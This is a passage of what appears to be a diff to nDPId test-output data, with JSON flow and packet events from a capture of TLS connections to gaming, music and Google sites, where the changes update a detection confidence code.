1biscABcAQQR0Q9Knvll2eKORbkRyexBvYc7r+Q69FpqwjjnvO3KMU7d3ZPOw9jaGO1B0c9lo8UIHFSOSayE0o5gPreutfPv3ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":431,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482879964,"flow_last_seen":1646482879983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482879983,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"sites.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482879964,"flow_last_seen":1646482879998,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482879998,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.51.246.65","src_port":46264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Playstation","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"static.playstation.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482896911,"flow_last_seen":1646482896911,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482896911,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1646482896911,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896911,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8pPpAAEAGn8vAqAGAbIrHQ6iOAbuXn2EUAAAAAKAC+vCb0AAAAgQFtAQCCApW0sF4AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1646482896918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482896918,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8E58AAPcGuiZsisdDwKgBgAG7qI5txRYul59hFaAS\/\/+2KgAAAgQFoAQCCAqPYc1DVtLBeAEDAwg="} 01163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1646482896921,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482896921,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5pPxAAEAGnczAqAGAbIrHQ6iOAbuXn2EVbcUWL4AYAfaXogAAAQEIClbSwYKPYc1DFgMBAgABAAH8AwNMrbkme+2pG6WKGaUcTfCs10ic95it0jPiimTr5KWaaiCmUwwyrZpDXgONpktntKRQJ28LAppHGUwuuBwH65AqlAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAApkZWV6ZXIuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIAS3iFI+Lml2aqbJ99HMOh2pxKpjuORM+VA6AJN2jS5cABcAQQS2OgHZ7hQeCCurKRe6Z6o4CXtv3DRVG4xO7HV8XVI+fMr+wQD4VFXUBMvHu9XDFEguxQ+LZymMWbInoPBoAAbBACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482896911,"flow_last_seen":1646482896921,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482896921,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"sites.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482896911,"flow_last_seen":1646482896928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482896928,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"108.138.199.67","src_port":43150,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Deezer","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.3","client_requested_server_name":"deezer.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482916232,"flow_last_seen":1646482916232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482916232,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.65.82.67","src_port":52070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1646482916232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916232,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ooZAAEAGcYnAqAGAEkFSQ8tmAFAueWmfAAAAAKAC+vBogwAAAgQFtAQCCApZaACoAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"sites.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1646482916249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482916249,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8Lu8AAPcGbiASQVJDwKgBgABQy2YtbN9PLnlpoKAS\/\/+hEQAAAgQFoAQCCAqviQYeWWgAqAEDAwk="} @@ -213,128 +213,128 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1646482940480,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940480,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA806FAAEAGYWnAqAGAjvq0jpfKAbsw63pbAAAAAKAC+vDytAAAAgQFtAQCCAoU3PsAAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1646482940487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482940487,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8FycAAHkGJGSO+rSOwKgBgAG7l8rhydulMOt6XKAS\/\/9c9AAAAgQFlgQCCAqRbEHhFNz7AAEDAwg="} 01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1646482940491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482940491,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI506NAAEAGX2rAqAGAjvq0jpfKAbsw63pc4cnbpoAYAfb+6AAAAQEIChTc+wqRbEHhFgMBAgABAAH8AwO7ribOnVQsY1sOMkcbEYXbLY3qPQQ51Elay7+WtVSrNSAVw+m3VKjUN5Kg0hk0Rcql0l9JhorDl+A6BcRaD2MOQwAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAUABIAAA9tYXBzLmdvb2dsZS5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAgZi1V3KN\/7YwDfK8H3VIJ+hl8oG\/pcyHsJbGlMXjOc2MAFwBBBJu4yUB5A9M8e+22tNqv37PZXfAJovqkKxk\/cRDsm65QH7HDIBoXPUoAJy1c6x2wwBosAz8dzXVrLnN4Hqic9PsAKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482940480,"flow_last_seen":1646482940491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482940491,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":444,"source":"sites.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482940480,"flow_last_seen":1646482940513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482940513,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"142.250.180.142","src_port":38858,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleMaps","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"maps.google.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482995689,"flow_last_seen":1646482995689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482995689,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":445,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1646482995689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995689,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8enxAAEAGb8fAqAGAAhGMP78GAburV\/8MAAAAAKAC+vDqEgAAAgQFtAQCCArEqeKzAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1646482995709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482995709,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8kMCEYw\/wKgBgAG7vwYhgnsXq1f\/DaAS\/ohOCgAAAgQFtAQCCAocht8\/xKniswEDAwc="} 01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1646482995711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482995711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5en5AAEAGbcjAqAGAAhGMP78GAburV\/8NIYJ7GIAYAfY3gAAAAQEICsSp4socht8\/FgMBAgABAAH8AwNFE1YF0dNQQhTDT2LTts3l72ip1ON6WYuBYFjp45zAOSCfsggN3rEBQ1caacueVCEG9V0G2r03kBuc\/FQ9ILx8tQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAVABMAABBhY2NvdW50Lnhib3guY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIKOdg7M8WplrJ1dHmYhafGTWEV65\/XHCmgpJRZB9OyhxABcAQQSUMlyZp7X5PylQs43MbEemG5LZD4aMK86EfSyduzhW1kr6wtZBIJI7MJb\/MCOqF0\/ebXOaYXIP5autWsClQmu8ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":447,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482995689,"flow_last_seen":1646482995711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482995711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":448,"source":"sites.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482995689,"flow_last_seen":1646482995732,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482995732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.140.63","src_port":48902,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Xbox","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.3","client_requested_server_name":"account.xbox.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"sites.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646483012464,"flow_last_seen":1646483012464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646483012464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.97.160.2","src_port":39828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 